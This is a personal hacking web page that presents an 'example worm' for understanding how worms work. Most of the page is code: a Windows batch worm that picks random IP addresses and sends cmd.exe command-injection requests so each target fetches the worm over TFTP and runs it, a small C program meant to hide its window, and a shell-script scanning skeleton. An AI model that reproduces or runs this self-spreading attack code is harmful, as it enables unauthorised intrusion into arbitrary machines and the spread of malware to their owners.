Matt's Page

 matthewcoan1976@hotmail.com
http://matthewcoan76.dns2go.com/~mcoan/
 
Path: Hacking : Worms :

Worm Page An example worm used to understand how computer worms work.

worm.bat 

ECHO OFF
TFTP -i %1% GET HIDEME.EXE
HIDEME
SET ME=`HOSTNAME`
TFTP -i %1% GET TFTPD.EXE
TFTP -i %1% GET WGET.EXE
START TFTPD
:WORM_LOOP
SET /A A=%RANDOM%%%256
SET /A B=%RANDOM%%%256
SET /A C=%RANDOM%%%256
SET /A D=%RANDOM%%%256
SET REMOTE_HOST=%A%.%B%.%C%.%D%
ECHO %REMOTE_HOST%
START CMD /C WGET "http://%REMOTE_HOST%/scripts/cmd.exe?+/c+tftp+-i+GET+%ME%+worm.bat" "&&" WGET "http://%REMOTE_HOST%/scripts/cmd.exe?+/c+worm.bat+%ME%"
GOTO WORM_LOOP
ECHO ON
EXIT 0


hideme.c 

#include <windows.h>

int
main()
{
   ShowWindow(NULL, SW_HIDE);
   return 0;
}


worm.sh 
#/bin/sh

a=0;
b=0;
c=0;
d=0;

ME=`hostname`;

while echo "" > /dev/null;
do
   a=$(($RANDOM % 256));
   b=$(($RANDOM % 256));
   c=$(($RANDOM % 256));
   d=$(($RANDOM % 256));

   REMOTE_SYSTEM="${a}.${b}.${c}.${d}";

   echo $REMOTE_SYSTEM;

   #
   #ATTACK WITH WORM BREAKIN CODE AT THIS POINT
   #
done